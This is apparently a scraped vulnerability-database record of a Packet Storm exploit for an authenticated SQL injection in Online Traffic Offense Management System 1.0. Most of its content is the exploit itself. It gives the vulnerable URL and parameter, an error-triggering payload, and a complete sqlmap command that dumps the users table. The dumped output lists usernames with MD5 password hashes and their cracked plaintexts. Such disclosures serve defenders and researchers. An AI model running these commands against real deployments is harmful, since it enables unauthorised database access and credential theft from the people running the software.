DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:163893", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Online Traffic Offense Management System 1.0 SQL Injection", "description": "", "published": "2021-08-20T00:00:00", "modified": "2021-08-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/163893/Online-Traffic-Offense-Management-System-1.0-SQL-Injection.html", "reporter": "Justin White", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-08-20T15:55:56", "viewCount": 111, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/163893/otoms10-sql.txt", "sourceData": "`# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated) \n# Date: 19/08/2021 \n# Exploit Author: Justin White \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html \n# Version: 1.0 \n# Testeted on: Linux (Ubuntu 20.04) using LAMPP \n \n## SQL Injection \n \n# Vulnerable page \nhttp://localhost/traffic_offense/admin/?page=drivers/manage_driver&id= \n \n#Vulnerable paramater \nThe id paramater is Vulnerable to sqli \n \n#POC \ngoing to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page. \n \nNotice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5 \nNotice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10 \n \nUsing sqlmap with dump database \nsqlmap -u \"http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4\" --cookie=\"PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac\" -D traffic_offense_db -T users --dump \n \n+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ \n| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated | \n+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ \n| 1 | 1 | uploads/1624240500_avatar.png | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2021-06-21 09:55:07 | \n| 9 | 2 | uploads/1629336240_avatar.jpg | Smith | 202cb962ac59075b964b07152d234b70 (123) | jsmith1 | John | 2021-08-19 09:24:25 | NULL | 2021-08-19 19:14:58 | \n+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ \n \n`\n", "_state": {"dependencies": 1646161120}}

{}